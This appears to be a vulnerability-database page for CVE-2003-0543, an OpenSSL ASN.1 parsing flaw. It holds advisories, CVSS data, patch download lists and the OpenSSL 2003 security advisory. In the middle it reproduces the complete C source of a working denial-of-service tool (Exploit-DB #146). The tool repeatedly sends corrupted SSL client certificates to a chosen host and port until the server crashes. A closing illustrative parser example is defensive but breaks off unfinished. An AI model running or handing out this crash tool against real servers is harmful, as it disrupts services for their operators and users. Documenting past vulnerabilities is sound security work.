CVE-2003-0543
CVSS 5.0
Published: 2003-11-17 00:00:00
Last revised: 2011-03-07 21:12:45

[Original description] Integer overflow in OpenSSL 0.9.6 and 0.9.7 allows remote attackers to cause a denial of service (crash) via an SSL client certificate with certain ASN.1 tag values.


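[CNNVD] OpenSSL ASN.1 multiple parsing security vulnerabilities (CNNVD-200311-070)

        OpenSSL is an open-source SSL implementation that provides strong encryption for network communications and is now widely used in many network applications.
        The ASN.1 parsing code in OpenSSL has multiple problems; a remote attacker can exploit them to cause a denial of service or execute arbitrary code.
        The issues are as follows:
        1. Certain ASN.1 encodings that the parser rejects as invalid trigger an error when the corresponding data structure is processed, corrupting the stack. This can be used for remote denial of service. It is currently unclear whether it can be used to execute arbitrary code. This issue does not affect OpenSSL 0.9.6.
        2. Incorrect ASN.1 tag values can, under certain conditions, cause an out-of-bounds read (an integer overflow issue), leading to denial of service.
        3. If the software is set to ignore public key decoding errors, a certificate containing a malformed public key will crash the service. Public key decoding errors are normally not ignored (except when debugging). It is currently unclear whether this can be exploited to execute arbitrary code.
        4. Due to an error in SSL/TLS protocol handling, a server will parse a client certificate even when none was requested. Strictly speaking this is not a vulnerability, but it means that SSL/TLS servers using OpenSSL can be attacked through issues 1, 2 and 3 even when client authentication is not enabled.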
        

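- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]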

- CPE (affected platforms and products)

cpe:/a:openssl:openssl:0.9.6 OpenSSL Project OpenSSL 0.9.6
cpe:/a:openssl:openssl:0.9.7 OpenSSL Project OpenSSL 0.9.7

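- OVAL (technical details for detection)

oval:org.mitre.oval:def:5292 Multiple Vendor OpenSSL 0.9.6, 0.9.7 ASN.1 Vulnerabilities
oval:org.mitre.oval:def:4254 OpenSSL Integer Overflow Vulnerability
*OVAL describes in detail how to detect this vulnerability; more technical detail on detection can be found in the related OVAL definitions.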

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0543
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0543
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-070
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/255484
(UNKNOWN)  CERT-VN  VU#255484
http://www.cert.org/advisories/CA-2003-26.html
(UNKNOWN)  CERT  CA-2003-26
http://www.redhat.com/support/errata/RHSA-2003-291.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:291
http://www.vupen.com/english/advisories/2006/3900
(UNKNOWN)  VUPEN  ADV-2006-3900
http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm
(UNKNOWN)  MISC  http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm
http://www.redhat.com/support/errata/RHSA-2003-292.html
(UNKNOWN)  REDHAT  RHSA-2003:292
http://www.linuxsecurity.com/advisories/engarde_advisory-3693.html
(UNKNOWN)  ENGARDE  ESA-20030930-027
http://www.debian.org/security/2003/dsa-394
(UNKNOWN)  DEBIAN  DSA-394
http://www.debian.org/security/2003/dsa-393
(UNKNOWN)  DEBIAN  DSA-393
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201029-1
(UNKNOWN)  SUNALERT  201029
http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=104893
(VENDOR_ADVISORY)  CONFIRM  http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=104893
http://www.securityfocus.com/bid/8732
(UNKNOWN)  BID  8732
http://www-1.ibm.com/support/docview.wss?uid=swg21247112
(UNKNOWN)  CONFIRM  http://www-1.ibm.com/support/docview.wss?uid=swg21247112
http://secunia.com/advisories/22249
(UNKNOWN)  SECUNIA  22249

- Vulnerability information

OpenSSL ASN.1 multiple parsing security vulnerabilities
Medium severity  Unknown
2003-11-17 00:00:00 2010-01-28 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-394-1) and corresponding patches for this issue:
        DSA-394-1: New openssl095 packages fix denial of service
        Link:
        http://www.debian.org/security/2002/dsa-394

        Patch downloads:
        Source archives:
        
        http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.dsc

        Size/MD5 checksum: 631 ba6e597ab2db2984aef6c2a765ac29c0
        
        http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a-6.woody.3.diff.gz

        Size/MD5 checksum: 38851 6b197111a7068a7ea29ef55176771d89
        
        http://security.debian.org/pool/updates/main/o/openssl095/openssl095_0.9.5a.orig.tar.gz

        Size/MD5 checksum: 1892089 99d22f1d4d23ff8b927f94a9df3997b4
        Alpha architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_alpha.deb

        Size/MD5 checksum: 497152 fe3d6854382f8dbe2d10f3f5700dd8f6
        ARM architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_arm.deb

        Size/MD5 checksum: 402498 551b79fbb80903f174d6edeffd9869df
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_i386.deb

        Size/MD5 checksum: 399752 2a856ac6b45d41beb0bf78880b236966
        Motorola 680x0 architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_m68k.deb

        Size/MD5 checksum: 376738 980e428e9b913672d939ebe77c18cd6d
        Big endian MIPS architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mips.deb

        Size/MD5 checksum: 412624 b8c7cc0b4dcbf1cf03480b93c78cd610
        Little endian MIPS architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mipsel.deb

        Size/MD5 checksum: 407388 de02385580cf33c344c1ffadcf8aed88
        PowerPC architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_powerpc.deb

        Size/MD5 checksum: 425452 c3d04af89c64e6e9f0175e6cd4997058
        Sun Sparc architecture:
        
        http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_sparc.deb

        Size/MD5 checksum: 412196 ae1181c2873a304c583800459da53e5a
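        Patch installation:
        1. Install the patch package manually:
         First, download the patch package with the following command:
         # wget url (url is the patch download link)
         Then install the patch with the following command:
         # dpkg -i file.deb (file is the name of the corresponding patch)
        2. Install the patch package automatically with apt-get:
         First, update the internal database with the following command:
         # apt-get update

         Then install the updated packages with the following command:
         # apt-get upgrade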
        HP
        --
        
        http://www.debian.org/security/2003/dsa-394

        MandrakeSoft
        ------------
        The vendor has released upgrade patches that fix this security issue; download them from the vendor's home page:
        MandrakeSoft Corporate Server 2.1 x86_64:
        Mandrake Upgrade libopenssl0-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.6.90mdk.x86_64.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1/x86_64 FTP Folder: x86_64/corporate/2.1/RPMS/
        MandrakeSoft Corporate Server 2.1:
        Mandrake Upgrade libopenssl0-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Corporate Server 2.1 FTP Folder: corporate/2.1/RPMS/
        MandrakeSoft Multi Network Firewall 8.2:
        Mandrake Upgrade libopenssl0-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Multi Network Firewall 8.2 FTP Folder: mnf8.2/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Multi Network Firewall 8.2 FTP Folder: mnf8.2/RPMS/
        MandrakeSoft Linux Mandrake 8.2:
        Mandrake Upgrade libopenssl0-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        Mandrake Upgrade openssl-0.9.6i-1.5.82mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 8.2 FTP Folder: 8.2/RPMS/
        MandrakeSoft Linux Mandrake 9.0:
        Mandrake Upgrade libopenssl0-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 9.0 FTP Folder: 9.0/RPMS/
        Mandrake Upgrade libopenssl0-static-devel-0.9.6i-1.6.90mdk.i586.rpm
        
        http://www.mandrakesecure.net/en/ftp.php

        Mandrake Linux 9.0 FTP Folder: 9.0/RPMS/
        Mandrake Upgrade openssl-0

- Vulnerability information (146)

Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b) (EDBID:146)
multiple dos
2003-10-09 Verified
0 Bram Matthys
N/A
/* Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)
 * written by Bram Matthys (Syzop) on Oct 9 2003.
 *
 * This program sends corrupt client certificates to the SSL
 * server which will 1) crash it 2) create lots of error messages,
 * and/or 3) result in other "interesting" behavior.
 *
 * I was able to crash my own ssl app in 5-15 attempts,
 * apache-ssl only generated error messages but after several hours
 * some children went into some kind of eat-all-cpu-loop... so YMMV.
 *
 * It's quite ugly but seems to compile at Linux/FreeBSD.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/signal.h>
#include <arpa/nameser.h>
#include <sys/time.h>
#include <time.h>
#include <errno.h>

char buf[8192];

/* This was simply sniffed from an stunnel session */
const char dacrap[] = 
"\x16\x03\x00\x02\x47\x0b\x00\x02\x43\x00\x02\x40\x00\x02\x3d\x30\x82"
"\x02\x39\x30\x82\x01\xa2\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06"
"\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x30\x57\x31\x0b\x30"
"\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06\x03\x55"
"\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31\x1f\x30"
"\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c\x20\x44"
"\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12\x30\x10"
"\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x30"
"\x1e\x17\x0d\x30\x33\x30\x36\x31\x32\x32\x33\x35\x30\x34\x39\x5a\x17"
"\x0d\x30\x34\x30\x36\x31\x31\x32\x33\x35\x30\x34\x39\x5a\x30\x57\x31"
"\x0b\x30\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06"
"\x03\x55\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31"
"\x1f\x30\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c"
"\x20\x44\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12"
"\x30\x10\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73"
"\x74\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01"
"\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xe6\x95\x5c\xc0"
"\xcb\x03\x78\xf1\x1e\xaa\x45\xb7\xa4\x10\xd0\xc1\xd5\xc3\x8c\xcc\xca"
"\x17\x7b\x48\x9a\x21\xf2\xfa\xc3\x25\x07\x0b\xb7\x69\x17\xca\x59\xf7"
"\xdf\x67\x7b\xf1\x72\xd5\x05\x61\x73\xe8\x70\xbf\xb9\xfa\xc8\x4b\x03"
"\x41\x62\x71\xf9\xf5\x4e\x28\xb8\x3b\xe4\x33\x76\x47\xcc\x1e\x04\x71"
"\xda\xc4\x0b\x05\x46\xf4\x52\x72\x99\x43\x36\xf7\x37\x6d\x04\x1c\x7a"
"\xde\x2a\x0c\x45\x4a\xb6\x48\x33\x3a\xad\xec\x16\xcc\xe7\x99\x58\xfd"
"\xef\x4c\xc6\xdd\x39\x76\xb6\x50\x76\x2a\x7d\xa0\x20\xee\xb4\x2c\xe0"
"\xd2\xc9\xa1\x2e\x31\x02\x03\x01\x00\x01\xa3\x15\x30\x13\x30\x11\x06"
"\x09\x60\x86\x48\x01\x86\xf8\x42\x01\x01\x04\x04\x03\x02\x06\x40\x30"
"\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x03\x81\x81"
"\x00\x9f\xff\xa9\x93\x70\xb9\xae\x48\x47\x09\xa1\x11\xbf\x01\x34\xbf"
"\x1f\x1e\xed\x88\x3e\x57\xe0\x37\x72\x0d\xec\xc7\x21\x44\x12\x99\x3a"
"\xfa\xaf\x79\x57\xf4\x7f\x99\x68\x37\xb1\x17\x83\xd3\x51\x44\xbd\x50"
"\x67\xf8\xd6\xd0\x93\x00\xbb\x53\x3d\xe2\x3d\x34\xfc\xed\x60\x85\xea"
"\x67\x7f\x91\xec\xfa\xe3\xd8\x78\xa2\xf4\x61\xfa\x77\xa3\x3f\xe4\xb1"
"\x41\x95\x47\x23\x03\x1c\xbf\x2e\x40\x77\x82\xef\xa0\x17\x82\x85\x03"
"\x90\x35\x4e\x85\x0d\x0f\x4d\xea\x16\xf5\xce\x15\x21\x10\xf9\x56\xd0"
"\xa9\x08\xe5\xf9\x9d\x5c\x43\x75\x33\xe2\x16\x03\x00\x00\x84\x10\x00"
"\x00\x80\x6e\xe4\x26\x03\x97\xb4\x5d\x58\x70\x36\x98\x31\x62\xd4\xef"
"\x7b\x4e\x53\x99\xad\x72\x27\xaf\x05\xd4\xc9\x89\xca\x04\xf1\x24\xa4"
"\xa3\x82\xb5\x89\x3a\x2e\x8f\x3f\xf3\xe1\x7e\x52\x11\xb2\xf2\x29\x95"
"\xe0\xb0\xe9\x3f\x29\xaf\xc1\xcd\x77\x54\x6a\xeb\xf6\x81\x6b\xd5\xd6"
"\x0a\x3d\xc3\xff\x6f\x76\x4a\xf7\xc9\x61\x9f\x7b\xb3\x25\xe0\x2b\x09"
"\x53\xcf\x06\x1c\x82\x9c\x48\x37\xfa\x71\x27\x97\xec\xae\x6f\x4f\x75"
"\xb1\xa5\x84\x99\xf5\xed\x8c\xba\x0f\xd5\x33\x31\x61\x5d\x95\x77\x65"
"\x8d\x89\x0c\x7d\xa7\xa8\x95\x5a\xc7\xb8\x35\x16\x03\x00\x00\x86\x0f"
"\x00\x00\x82\x00\x80\x78\x1d\xbd\x86\xcb\x6e\x06\x88\x57\x9e\x3d\x21"
"\x7e\xca\xd1\x75\xff\x33\xef\x48\x4d\x88\x96\x84\x8c\x2f\xfb\x92\x1d"
"\x15\x28\xef\xe0\xd3\x4d\x20\xe9\xae\x6c\x5c\xed\x46\xc0\xef\x4e\xb4"
"\xe4\xcf\xe9\x73\xb8\xd2\x8b\xe6\x5e\xb9\x0c\x67\xbe\x17\x13\x31\x3f"
"\xe5\xe1\x9a\x2d\xfe\xb4\xd6\xdb\x8f\xbc\x15\x22\x10\x65\xe1\xad\x5f"
"\x00\xd0\x48\x8d\x4e\xa7\x08\xbd\x5c\x40\x77\xb8\xa9\xbe\x58\xb0\x15"
"\xd2\x4c\xc8\xa1\x79\x63\x25\xeb\xa1\x32\x61\x3b\x49\x82\xf1\x3a\x70"
"\x80\xf8\xdc\xf7\xf9\xfc\x50\xc7\xa2\x5d\xe4\x30\x8e\x09\x14\x03\x00"
"\x00\x01\x01\x16\x03\x00\x00\x40\xfe\xc2\x1f\x94\x7e\xf3\x0b\xd1\xe1"
"\x5c\x27\x34\x7f\x01\xe9\x51\xd3\x18\x33\x9a\x99\x48\x6e\x13\x6f\x82"
"\xb2\x2c\xa5\x7b\x36\x5d\x85\xf5\x17\xe3\x4f\x2a\x04\x15\x2d\x0e\x2f"
"\x2c\xf9\x1c\xf8\x9e\xac\xd5\x6c\x20\x81\xe5\x22\x54\xf1\xe1\xd0\xfd"
"\x64\x42\xfb\x34";

#define CRAPLEN (sizeof(dacrap)-1)


int send_hello()
{
int len;
char *p = buf;
	*p++ = 22;				/* Handshake */
	PUTSHORT(0x0300, p);	/* SSL v3 */
	PUTSHORT(85, p);		/* Length will be 85 bytes */
	
	*p++ = 1;				/* Client hello */

	*p++ = 0;				/* Length: */
	PUTSHORT(81, p);		/* 81 bytes */

	PUTSHORT(0x0300, p);	/* SSL v3 */
	PUTLONG(0xffffffff, p);	/* Random.gmt_unix_time */

	/* Now 28 bytes of random data... (7x4bytes=28) */
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);
	PUTLONG(0x11223344, p);

	*p++ = 0;				/* Session ID 0 */
	
	PUTSHORT(42, p);		/* Cipher Suites Length */
	PUTSHORT(0x16, p);
	PUTSHORT(0x13, p);
	PUTSHORT(0x0a, p);
	PUTSHORT(0x66, p);
	PUTSHORT(0x07, p);
	PUTSHORT(0x05, p);
	PUTSHORT(0x04, p);
	PUTSHORT(0x65, p);
	PUTSHORT(0x64, p);
	PUTSHORT(0x63, p);
	PUTSHORT(0x62, p);
	PUTSHORT(0x61, p);
	PUTSHORT(0x60, p);
	PUTSHORT(0x15, p);
	PUTSHORT(0x12, p);
	PUTSHORT(0x09, p);
	PUTSHORT(0x14, p);
	PUTSHORT(0x11, p);
	PUTSHORT(0x08, p);
	PUTSHORT(0x06, p);
	PUTSHORT(0x03, p);

	*p++ = 1;				/* Compression method length: 1 */
	*p++ = 0;				/* (null) */

	len = p - buf;
	return len;
}

int send_crap()
{
	memcpy(buf, dacrap, CRAPLEN);
	return CRAPLEN;
}



void corruptor(char *buf, int len)
{
int cb, i, l;

	cb = rand()%15+1; /* bytes to corrupt */

	for (i=0; i < cb; i++)
	{
		l = rand()%len;
		buf[l] = rand()%256;
	}
}

void diffit()
{
int i;
	printf("DIFF:\n");
	for (i=0; i < CRAPLEN; i++)
	{
		if (buf[i] != dacrap[i])
			printf("Offset %d: 0x%x -> 0x%x\n", i, dacrap[i], buf[i]);
	}
	printf("*****\n");
}


int main(int argc, char *argv[])
{
	struct sockaddr_in addr;
	int s, port = 0, first = 1, len;
	char *host = NULL;
	unsigned int seed;
	struct timeval tv;

	printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");
	
	if (argc != 3) {
		fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
		exit(1);
	}

	host = argv[1];
	port = atoi(argv[2]);
	if ((port < 1) || (port > 65535)) {
		fprintf(stderr, "Port out of range (%d)\n", port);
		exit(1);
	}

	gettimeofday(&tv, NULL);
	seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);

	printf("seed = %u\n", seed);
	srand(seed);

	memset(&addr, 0, sizeof(addr));


	signal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */

while(1)
{

	if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		fprintf(stderr, "Socket error: %s\n", strerror(errno));
		exit(EXIT_FAILURE);
	}
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);
	addr.sin_addr.s_addr = inet_addr(host);
	if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
		if (!first)
			diffit();
		exit(EXIT_FAILURE);
	}
	first = 0;
	printf("."); fflush(stdout);

	len = send_hello();
	write(s, buf, len);
	len = send_crap();
	corruptor(buf, len);
	write(s, buf, len);
	usleep(1000); /* wait.. */
	close(s);
}
	
	exit(EXIT_SUCCESS);
}



// milw0rm.com [2004-01-21]		

- Vulnerability information (F32590)

sslexp.c (PacketStormID:F32590)
2004-01-30 00:00:00
Bram Matthys
exploit
CVE-2003-0545,CVE-2003-0543,CVE-2003-0544

Brute forcer for OpenSSL ASN.1 parsing bugs that affect versions 0.9.6j and below and 0.9.7b and below.

- Vulnerability information (F31738)

secadv_20030930.txt (PacketStormID:F31738)
2003-09-30 00:00:00

advisory,denial of service,arbitrary,vulnerability,code execution
CVE-2003-0545,CVE-2003-0543,CVE-2003-0544

Three vulnerabilities lie in the ASN.1 parsing for OpenSSL versions up to 0.9.6j and 0.9.7b and all versions of SSLeay. All of the vulnerabilities result in a denial of service, and there is still speculation as to whether arbitrary code execution is possible.

-----BEGIN PGP SIGNED MESSAGE-----

OpenSSL Security Advisory [30 September 2003]

Vulnerabilities in ASN.1 parsing
================================

NISCC (www.niscc.gov.uk) prepared a test suite to check the operation
of SSL/TLS software when presented with a wide range of malformed client
certificates.

Dr Stephen Henson (steve@openssl.org) of the OpenSSL core team
identified and prepared fixes for a number of vulnerabilities in the
OpenSSL ASN1 code when running the test suite.

A bug in OpenSSLs SSL/TLS protocol was also identified which causes
OpenSSL to parse a client certificate from an SSL/TLS client when it
should reject it as a protocol error.

Vulnerabilities
- ---------------

1. Certain ASN.1 encodings that are rejected as invalid by the parser
can trigger a bug in the deallocation of the corresponding data
structure, corrupting the stack. This can be used as a denial of service
attack. It is currently unknown whether this can be exploited to run
malicious code. This issue does not affect OpenSSL 0.9.6.

2. Unusual ASN.1 tag values can cause an out of bounds read under
certain circumstances, resulting in a denial of service vulnerability.

3. A malformed public key in a certificate will crash the verify code if
it is set to ignore public key decoding errors. Public key decode errors
are not normally ignored, except for debugging purposes, so this is
unlikely to affect production code. Exploitation of an affected
application would result in a denial of service vulnerability.

4. Due to an error in the SSL/TLS protocol handling, a server will parse
a client certificate when one is not specifically requested. This by
itself is not strictly speaking a vulnerability but it does mean that
*all* SSL/TLS servers that use OpenSSL can be attacked using
vulnerabilities 1, 2 and 3 even if they don't enable client authentication.

Who is affected?
- ----------------

All versions of OpenSSL up to and including 0.9.6j and 0.9.7b and all
versions of SSLeay are affected.

Any application that makes use of OpenSSL's ASN1 library to parse
untrusted data. This includes all SSL or TLS applications, those using
S/MIME (PKCS#7) or certificate generation routines.

Recommendations
- ---------------

Upgrade to OpenSSL 0.9.7c or 0.9.6k. Recompile any OpenSSL applications
statically linked to OpenSSL libraries.

References
- ----------

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0545 for issue 1:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0545

and CAN-2003-0543 and CAN-2003-0544 for issue 2:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0543
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0544

URL for this Security Advisory:
http://www.openssl.org/news/secadv_20030930.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQCVAwUBP3mNKu6tTP1JpWPZAQFjPwP/Y8epYBa9oCK69dCT5Y90kg9Ir8pYuv+q
x4NxuyhD5JaJfmStwbl3BUSE5juI0mh7d6yFjfI0Ci3sdC+5v10ZOanGwX7o4JlS
3pGSSocAEiYS59qciRLtFsCbBt8jIOCG8KiTmKO2mI5dhAEB9UqPH9e8A1Wy/8un
xjGKYbcITrM=
=fFTe
-----END PGP SIGNATURE-----

    

- Vulnerability information

3949
OpenSSL ASN.1 Integer Handling Remote Overflow DoS
Local Access Required, Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public Vendor Verified

- Vulnerability description

A remote overflow exists in OpenSSL. OpenSSL fails to correctly handle error conditions in ASN.1 tags in SSL client certificates, resulting in an integer overflow. With a specially crafted request, an attacker can cause a denial of service in OpenSSL or an application using it, resulting in a loss of availability.
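
The class of bug described above, shown as an added example: this is not OpenSSL's code, and every name in it (`asn1_read_header`, `naive_high_tag`, `asn1_tag_or_error`, the `HDR_*` codes, the sample byte strings) is hypothetical. It decodes a BER/DER identifier in high-tag-number form with and without an overflow guard, and bounds-checks the length field against the bytes actually received.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative BER/DER header reader. All names are hypothetical;
 * this is not OpenSSL code. */
enum { HDR_OK = 0, HDR_TRUNCATED = -1, HDR_TAG_OVERFLOW = -2, HDR_BAD_LENGTH = -3 };

struct asn1_hdr {
    int tag_class;    /* bits 8-7 of the first identifier octet */
    int constructed;  /* bit 6 */
    int tag;          /* tag number, never negative on success */
    size_t hdr_len;   /* identifier + length octets consumed */
    size_t body_len;  /* content length, never more than the bytes left */
};

/* Constructed sample inputs (not captured traffic). */
static const unsigned char SAMPLE_SEQ[]       = { 0x30, 0x03, 0x02, 0x01, 0x05 };
static const unsigned char SAMPLE_HIGH_TAG[]  = { 0x9f, 0x81, 0x00, 0x01, 0xaa };
static const unsigned char SAMPLE_WRAP_ZERO[] = { 0x1f, 0x90, 0x80, 0x80, 0x80, 0x00, 0x00 };
static const unsigned char SAMPLE_WRAP_NEG[]  = { 0x1f, 0x8f, 0xff, 0xff, 0xff, 0x7f, 0x00 };
static const unsigned char SAMPLE_LONG_LEN[]  = { 0x04, 0x82, 0x01, 0x00, 0x41 };

/* Unchecked accumulation of the octets that follow a 0x1f identifier, kept
 * for comparison only. uint32_t makes the wraparound well defined. */
int32_t naive_high_tag(const unsigned char *p, size_t n)
{
    uint32_t t = 0;
    for (size_t i = 0; i < n; i++) {
        t = (t << 7) | (p[i] & 0x7f);
        if (!(p[i] & 0x80))       /* high bit clear: last tag octet */
            break;
    }
    return (int32_t)t;            /* may be negative or alias a small tag */
}

/* Checked reader: refuses a tag that does not fit in int and a length that
 * points past the end of the buffer. Indefinite length is rejected. */
int asn1_read_header(const unsigned char *p, size_t avail, struct asn1_hdr *h)
{
    size_t i = 1, len;
    if (avail < 2)
        return HDR_TRUNCATED;
    h->tag_class = p[0] >> 6;
    h->constructed = (p[0] >> 5) & 1;
    h->tag = p[0] & 0x1f;
    if (h->tag == 0x1f) {                 /* high-tag-number form */
        int t = 0;
        for (;;) {
            if (i >= avail)
                return HDR_TRUNCATED;
            if (t > (INT_MAX >> 7))       /* the next shift would overflow */
                return HDR_TAG_OVERFLOW;
            t = (t << 7) | (p[i] & 0x7f);
            if (!(p[i++] & 0x80))
                break;
        }
        h->tag = t;
    }
    if (i >= avail)
        return HDR_TRUNCATED;
    len = p[i++];
    if (len == 0x80)
        return HDR_BAD_LENGTH;            /* indefinite length */
    if (len & 0x80) {                     /* long form: n length octets */
        size_t n = len & 0x7f;
        if (n > sizeof(size_t))
            return HDR_BAD_LENGTH;
        if (n > avail - i)
            return HDR_TRUNCATED;
        for (len = 0; n > 0; n--)
            len = (len << 8) | p[i++];
    }
    if (len > avail - i)                  /* body would run off the buffer */
        return HDR_BAD_LENGTH;
    h->hdr_len = i;
    h->body_len = len;
    return HDR_OK;
}

/* Tag number on success, negative HDR_* code on error. */
int asn1_tag_or_error(const unsigned char *p, size_t avail)
{
    struct asn1_hdr h;
    int rc = asn1_read_header(p, avail, &h);
    return rc == HDR_OK ? h.tag : rc;
}

int main(void)
{
    printf("wrap to zero: naive=%d checked=%d\n",
           (int)naive_high_tag(SAMPLE_WRAP_ZERO + 1, sizeof SAMPLE_WRAP_ZERO - 1),
           asn1_tag_or_error(SAMPLE_WRAP_ZERO, sizeof SAMPLE_WRAP_ZERO));
    printf("wrap negative: naive=%d checked=%d\n",
           (int)naive_high_tag(SAMPLE_WRAP_NEG + 1, sizeof SAMPLE_WRAP_NEG - 1),
           asn1_tag_or_error(SAMPLE_WRAP_NEG, sizeof SAMPLE_WRAP_NEG));
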